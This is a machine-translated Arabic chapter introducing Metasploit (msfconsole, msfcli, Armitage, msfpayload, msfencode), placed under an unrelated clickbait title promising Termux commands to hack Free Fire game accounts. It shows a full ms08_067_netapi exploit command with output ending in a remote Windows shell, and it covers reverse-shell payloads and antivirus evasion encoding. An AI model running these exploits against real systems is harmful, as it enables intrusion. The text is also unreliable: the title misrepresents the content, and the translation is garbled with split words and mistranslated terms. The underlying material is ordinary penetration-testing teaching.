اوامر termux اختراق حسابات فري فاير تهكير حسابات فري فاير Free Fire Hacking

أساسيات METASPLOIT عندما تصادف إطار عمل Metasploit (MSF) لأول مرة ، قد تطغى عليك العديد من الواجهات والخيارات والمرافق والمتغيرات والوضعيات- أولي.  في هذا الفصل ، سنركز على الأساسيات التي من شأنها تساعدك على فهم الصورة الكبيرة.  سنراجع بعض المصطلحات الأساسية لاختبار الاختراق وبعد ذلك تغطية مختصرة لواجهات المستخدم المختلفة التي توفرها Metasploit.  ميتا Sploit نفسه هو برنامج مجاني مفتوح المصدر ، مع العديد من المساهمين في المجال rity ، ولكن يتوفر أيضًا نسختان تجاريتان من Metasploit. عند استخدام Metasploit لأول مرة ، من المهم عدم التعلق بهذا الجديد- إستغلال  بدلاً من ذلك ، ركز على كيفية عمل Metasploit والأوامر استخدمته لجعل الاستغلال ممكنًا. المصطلح في هذا الكتاب ، سنستخدم مصطلحات مختلفة تحمل أولاً بعضًا من شرح- نشوئها.  يتم تعريف غالبية المصطلحات الأساسية التالية في سياق Metasploit ، لكنها بشكل عام هي نفسها في جميع أنحاء صناعة الأمن استغلال الثغرة هي الوسيلة التي يستخدمها المهاجم أو المختبِر ميزة وجود خلل داخل نظام أو تطبيق أو خدمة.  مهاجم يستخدم استغلالاً لمهاجمة نظام بطريقة تؤدي إلى هدف معين النتيجة التي لم يقصدها المطور أبدًا.  تشمل الثغرات الشائعة المخزن المؤقت الفائض ، والثغرات الأمنية في تطبيقات الويب (مثل إدخال SQL) ، والتحكم أخطاء التشكيل الحمولة الحمولة هي الكود الذي نريد أن ينفذه النظام ويجب تحديده وتم تسليمها بواسطة الإطار.  على سبيل المثال ، قذيفة عكسية هي حمولة ينشئ اتصالًا من الجهاز المستهدف إلى المهاجم باعتباره Win- dows موجه الأوامر (انظر الفصل 5) ، في حين أن غلاف الربط هو حمولة "يربط" موجه الأوامر بمنفذ الاستماع على الجهاز الهدف ، والذي يمكن للمهاجم الاتصال بعد ذلك.  يمكن أن تكون الحمولة أيضًا شيئًا بسيطًا مثل عدد قليل من الأوامر ليتم تنفيذها على نظام التشغيل الهدف. كود القشرة Shellcode هو مجموعة من التعليمات المستخدمة كحمولة عند حدوث الاستغلال. عادةً ما يتم كتابة كود القشرة بلغة التجميع.  في معظم الحالات ، أمر سيتم توفير قذيفة أو غلاف Meterpreter بعد سلسلة التعليمات تم تنفيذها بواسطة الجهاز المستهدف ، ومن هنا جاءت التسمية. وحدة الوحدة النمطية في سياق هذا الكتاب هي جزء من البرنامج يمكن استخدامه بواسطة إطار عمل Metasploit.  في بعض الأحيان ، قد تحتاج إلى استخدام استغلال الوحدة النمطية ، وهي أحد مكونات البرامج التي تنفذ الهجوم.  في أوقات أخرى ، أ قد تكون هناك حاجة إلى وحدة مساعدة لأداء عمل مثل المسح أو تعداد النظام.  هذه الوحدات القابلة للتبديل هي جوهر ما يجعل الإطار قويًا جدًا. المستمع المستمع هو مكون داخل Metasploit ينتظر اتصالاً واردًا من نوع ما.  على سبيل المثال ، بعد استغلال الجهاز المستهدف ، قد يحدث ذلك اتصل بالجهاز المهاجم عبر الإنترنت.  المستمع يتعامل مع هذا الارتباط- في انتظار اتصال الجهاز المهاجم من قبل النظام المستغل. واجهات Metasploit تقدم Metasploit أكثر من واجهة لوظائفها الأساسية ، بما في ذلك وحدة التحكم وسطر الأوامر والواجهات الرسومية.  بالإضافة إلى توفر هذه الواجهات والمرافق وصولاً مباشرًا إلى الوظائف التي عادةً ما تكون داخلي في Metasploit Framework.  يمكن أن تكون هذه المرافق لا تقدر بثمن استغلال التطوير والمواقف التي لا تحتاج إلى المرونة فيها من الإطار بأكمله. MSFconsole Msfconsole هو إلى حد بعيد الجزء الأكثر شيوعًا في Metasploit Framework ، ولسبب وجيه.  إنها واحدة من أكثرها مرونة ، وغنية بالميزات ، وجيدة الأدوات المدعومة ضمن الإطار.  يوفر برنامج Msfconsole جهازًا متعدد الإمكانات سهل الاستخدام واجهة لكل خيار وإعدادات متوفرة في الإطار تقريبًا ؛  انها كمتجر شامل لجميع أحلام الاستغلال.  يمكنك استخدام msfconsole لفعل كل شيء ، بما في ذلك إطلاق استغلال ، وتحميل الوحدات المساعدة ، إجراء العد أو إنشاء مستمعين أو إجراء استغلال جماعي ضد شبكة كاملة. على الرغم من أن Metasploit Framework يتغير باستمرار ، فإن مجموعة فرعية من تظل الأوامر ثابتة نسبيًا.  من خلال إتقان أساسيات msfconsole ، ستكون قادرًا على مواكبة أي تغييرات.  لتوضيح أهمية تعلم msfconsole ، سيتم استخدامه في كل فصل من فصول الكتاب تقريبًا. بدء تشغيل MSFconsole لبدء تشغيل msfconsole ، أدخل msfconsole في سطر الأوامر: root@bt:/# cd /opt/framework3/msf3/ root@bt:/opt/framework/msf3# msfconsole < metasploit > ------------ \ ,__, \ (oo)____ (__) )\ ||--|| * msf > للوصول إلى ملفات تعليمات msfconsole ، أدخل التعليمات متبوعة بالأمر التي تهتم بها. في المثال التالي ، نبحث عن المساعدة للأمر connect ، والذي يسمح لنا بالتواصل مع مضيف.  ال استخدام قوائم التوثيق الناتجة ووصف الأداة ومختلف أعلام الخيار. msf > help connect سنستكشف MSFConsole بعمق أكبر في الفصول التالية. MSFcli يتبع كل من Msfcli و msfconsole أساليب مختلفة جدًا لتوفير الوصول إلى ملفات إطار العمل.  حيث يوفر msfconsole طريقة تفاعلية للوصول إلى جميع الميزات بطريقة سهلة الاستخدام ، تضع msfcli الأولوية على البرمجة النصية والتفسير- القدرة مع الأدوات الأخرى المستندة إلى وحدة التحكم.  بدلاً من توفير اتصال فريد preter إلى Framework ، يعمل msfcli مباشرة من سطر الأوامر ، والذي يسمح لك بإعادة توجيه الإخراج من الأدوات الأخرى إلى msfcli وتوجيه msfcli الإخراج إلى أدوات سطر الأوامر الأخرى.  يدعم Msfcli أيضًا إطلاق المآثر والوحدات المساعدة ، ويمكن أن يكون مناسبًا عند اختبار النموذج- Uules أو تطوير مآثر جديدة للإطار.  إنها أداة رائعة لـ استغلال فريد عندما تعرف بالضبط أي استغلال وخيارات لك بحاجة إلى.  إنه أقل تسامحًا من msfconsole ، لكنه يقدم بعض المساعدة الأساسية (بما في ذلك- ing وقائمة بالأوضاع) باستخدام الأمر msfcli -h ، كما هو موضح هنا: root@bt:/opt/framework3/msf3# msfcli -h Usage: /opt/framework3/msf3/msfcli [mode] ============================================================================== Mode Description ---- --------------- (H)elp You're looking at it, baby! (S)ummary Show information about this module (O)ptions Show available options for this module (A)dvanced Show available advanced options for this module (I)DS Evasion Show available ids evasion options for this module (P)ayloads Show available payloads for this module (T)argets Show available targets for this exploit module (AC)tions Show available actions for this auxiliary module (C)heck Run the check routine of the selected module (E)xecute Execute the selected module root@bt:/opt/framework3/msf3# استخدام العينة دعونا نلقي نظرة على كيفية استخدام msfcli.  لا تقلق بشأن التفاصيل. تهدف هذه الأمثلة إلى إعطائك فكرة عن كيفية العمل معك هذه الواجهة. عندما تتعلم Metasploit لأول مرة أو كلما واجهتك مشكلة ، فأنت يمكنه رؤية الخيارات المتاحة في الوحدة النمطية عن طريق إلحاق الحرف O بالنهاية من الخيط في أي نقطة تكون عالقًا فيها.  على سبيل المثال ، في ما يلي في القائمة ، نستخدم O لرؤية الخيارات المتاحة للوحدة ms08_067_netapi: root@bt:/# msfcli windows/smb/ms08_067_netapi O [*] Please wait while we load the module tree... Name Current Setting Required Description ---- --------------- -------- ----------- RHOST     0.0.0.0     yes       The target address RPORT        445        yes          Set the SMB service port SMBPIPE   BROWSER     yes     The pipe name to use (BROWSER, SRVSVC) يمكنك أن ترى أن الوحدة تتطلب ثلاثة خيارات: RHOST و RPORT و سمبايب.  الآن ، بإضافة P ، يمكننا التحقق من الحمولات المتاحة: oot@bt:/# msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.155 P [*] Please wait while we load the module tree... Compatible payloads =================== Name Description ---- ----------- generic/debug_trap Generate a debug trap in the target process generic/shell_bind_tcp Listen for a connection and spawn a command shell بعد تعيين جميع الخيارات المطلوبة لاستغلالنا واختيار الدفع- load ، يمكننا تشغيل استغلالنا بتمرير الحرف E إلى نهاية msfcli سلسلة الوسيطة ، كما هو موضح هنا: root@bt:/# msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.155 PAYLOAD=windows/shell/bind_tcp E [*] Please wait while we load the module tree... [*] Started bind handler [*] Automatically detecting the target... [*] Fingerprint: Windows XP Service Pack 2 - lang:English [*] Selected Target: Windows XP SP2 English (NX) [*] Triggering the vulnerability... [*] Sending stage (240 bytes) [*] Command shell session 1 opened (192.168.1.101:46025 -> 192.168.1.155:4444) Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32> لقد نجحنا ، لأننا تلقينا أمر Windows موجه من النظام البعيد. ارميتاج مكون Armitage في Metasploit هو مستخدم رسومي تفاعلي بالكامل واجهة تم إنشاؤها بواسطة رافائيل مودج.  هذه الواجهة رائعة للغاية ، ميزة غنية ومتاحة مجانًا.  لن نغطي ارميتاج بعمق ، لكن من الجدير بالتأكيد ذكره كشيء لاستكشافه.  هدفنا لتعليم خصوصيات وعموميات Metasploit ، وستكون واجهة المستخدم الرسومية رائعة بمجرد قيامك بذلك فهم كيفية عمل إطار العمل بالفعل. تشغيل ارميتاج لإطلاق armitage ، قم بتشغيل الأمر armitage.  أثناء بدء التشغيل ، حدد بدء MSF ، والتي ستسمح لارميتاج بالاتصال بمثيل Metasploit الخاص بك. بعد تشغيل armitage ، ما عليك سوى النقر فوق قائمة لأداء ملف الهجوم أو الوصول إلى وظائف Metasploit الأخرى.  على سبيل المثال ، يوضح الشكل 2-1 المستعرض (من جانب العميل) مآثر. root@bt:/opt/framework3/msf3# armitage

الشكل 2-1: قائمة استغلال متصفح armitage أدوات Metasploit بعد تغطية واجهات Metasploit الرئيسية الثلاث ، حان الوقت لتغطية بعضها خدمات.  أدوات Metasploit هي واجهات مباشرة لميزات معينة في إطار يمكن أن يكون مفيدًا في مواقف محددة ، لا سيما في تطوير برمجيات إكسبلويت- opment.  سنغطي بعض المرافق الأكثر سهولة هنا و تقديم أشياء إضافية في جميع أنحاء الكتاب. MSFpayload يسمح لك مكون msfpayload في Metasploit بإنشاء كود قشرة ، القابلة للتنفيذ ، وأكثر من ذلك بكثير للاستخدام في عمليات الاستغلال خارج إطار العمل. يمكن إنشاء Shellcode في العديد من التنسيقات بما في ذلك C و Ruby و JavaScript و وحتى Visual Basic للتطبيقات.  سيكون كل تنسيق إخراج مفيدًا في حالات مختلفة.  على سبيل المثال ، إذا كنت تعمل بإثبات مستند إلى Python من المفهوم ، قد يكون إخراج النمط C هو الأفضل ؛  إذا كنت تعمل على متصفح استغلال ، قد يكون تنسيق إخراج JavaScript هو الأفضل.  بعد أن يكون لديك ما تريده الإخراج ، يمكنك بسهولة إدراج الحمولة مباشرة في ملف HTML لبدء التشغيل استغلال. لمعرفة الخيارات التي تتخذها الأداة المساعدة ، أدخل msfpayload -h في الأمر السطر كما هو موضح هنا: root@bt:/# msfpayload -h كما هو الحال مع msfcli ، إذا وجدت نفسك عالقًا في الخيارات المطلوبة للدفع- وحدة التحميل ، قم بإلحاق الحرف O في سطر الأوامر للحصول على قائمة بالمطلوب والمتغيرات الاختيارية ، مثل: root@bt:/# msfpayload windows/shell_reverse_tcp O سوف نتعمق أكثر في msfpayload بينما نستكشف تطوير برمجيات إكسبلويت في فصول لاحقة. MSFencode كود القشرة الذي تم إنشاؤه بواسطة msfpayload يعمل بكامل طاقته ، لكنه يحتوي على سبعة- الأحرف الفارغة التي تشير عند تفسيرها بواسطة العديد من البرامج إلى نهاية السلسلة ، وسيؤدي ذلك إلى إنهاء الرمز قبل الإكمال. بعبارة أخرى ، يمكن لهذه x00s و xffs كسر الحمولة الخاصة بك! بالإضافة إلى ذلك ، من المحتمل أن يكون كود القشرة الذي يعبر شبكة بنص واضح التقطتها أنظمة كشف التسلل (IDS) وبرامج مكافحة الفيروسات.  إلى لمعالجة هذه المشكلة ، يقدم مطورو Metasploit msfencode ، مما يساعد يمكنك تجنب الأحرف السيئة والتهرب من برامج مكافحة الفيروسات و IDS عن طريق تشفير ملف الحمولة الأصلية بطريقة لا تتضمن أحرفًا "سيئة".  أدخل msfencode -h لمشاهدة قائمة بخيارات msfencode. يحتوي Metasploit على عدد من برامج التشفير المختلفة لمواقف محددة. سيكون بعضها مفيدًا عندما يمكنك استخدام الأحرف الأبجدية الرقمية فقط كجزء من الحمولة ، كما هو الحال مع العديد من عمليات استغلال تنسيقات الملفات أو التطبيقات الأخرى التي تقبل فقط الأحرف القابلة للطباعة كمدخلات ، في حين أن البعض الآخر عامة جدًا ترميز الغرض الذي يعمل بشكل جيد في كل موقف. عندما تكون في شك ، لا يمكنك أن تخطئ في استخدام x86 / shikata_ تشفير ga_nai ، المشفر الوحيد بدرجة ممتاز ، مقياس موثوقية واستقرار الوحدة.  في سياق برنامج التشفير ، يتم إنشاء ملف يعني الترتيب الممتاز أنه أحد أكثر برامج التشفير تنوعًا و يمكن أن تستوعب درجة ضبط دقيقة أكبر من برامج التشفير الأخرى.  إلى راجع قائمة المشفرات المتاحة ، قم بإلحاق -l بـ msfencode كما هو موضح بعد ذلك.  ال الحمولات مرتبة حسب الموثوقية. root@bt:~# msfencode -l Nasm Shell يمكن أن تكون الأداة المساعدة nasm_shell.rb سهلة الاستخدام عندما تحاول فهمها رمز التجميع ، خاصةً إذا كنت بحاجة إلى تحديد- أثناء تطوير الاستغلال حدد أكواد التشغيل (تعليمات التجميع) لأمر تجميع معين. على سبيل المثال ، نقوم هنا بتشغيل الأداة ونطلب أكواد التشغيل لـ jmp الأمر esp ، الذي يخبرنا به nasm_shell هو FFE4. root@bt:/opt/framework3/msf3/tools# ./nasm_shell.rb nasm > jmp esp 00000000 FFE4 jmp esp Metasploit Express and Metasploit Pro Metasploit Express و Metasploit Pro هي واجهات ويب تجارية لـ إطار عمل Metasploit.  توفر هذه المرافق أتمتة كبيرة وتسهيل الأمور للمستخدمين الجدد ، مع الاستمرار في توفير الوصول الكامل إلى إطار العمل.  يوفر كلا المنتجين أيضًا أدوات غير متوفرة في إصدارات المجتمع من Framework ، مثل مؤتمتة كلمة المرور الإجبار والهجمات الآلية على مواقع الويب.  بالإضافة إلى ذلك ، يعود الإبلاغ الجميل- يمكن لـ end to Metasploit Pro تسريع أحد الجوانب الأقل شيوعًا في اختبار الاختراق: كتابة التقرير. هل هذه الأدوات تستحق الشراء؟  أنت فقط من يمكنه اتخاذ هذا الاختيار.  ال الإصدارات التجارية من Metasploit مخصصة للاختراق المهني المختبرين ويمكنهم تخفيف العديد من الجوانب الروتينية للوظيفة ، ولكن إذا كان يعد توفير الوقت من الأتمتة في هذه المنتجات التجارية مفيدًا بالنسبة لك ، قد يبررون سعر الشراء. تذكر ، مع ذلك ، وأنت تقوم بأتمتة عملك ، أن البشر أفضل في تحديد نواقل الهجوم من الأدوات الآلية. Wrapping Up في هذا الفصل ، تعلمت القليل من أساسيات إطار Metasploit- عمل.  أثناء تقدمك في هذا الكتاب ، ستبدأ في استخدام هذه الأدوات في ملف قدرة أكثر تقدمًا.  ستجد بعض الطرق المختلفة لتحقيق ذلك نفس المهام باستخدام أدوات مختلفة.  الأمر متروك لك في النهاية لتقرر ما الأداة التي تناسب احتياجاتك. الآن بعد أن أصبحت الأساسيات تحت السيطرة ، دعنا ننتقل إلى المرحلة التالية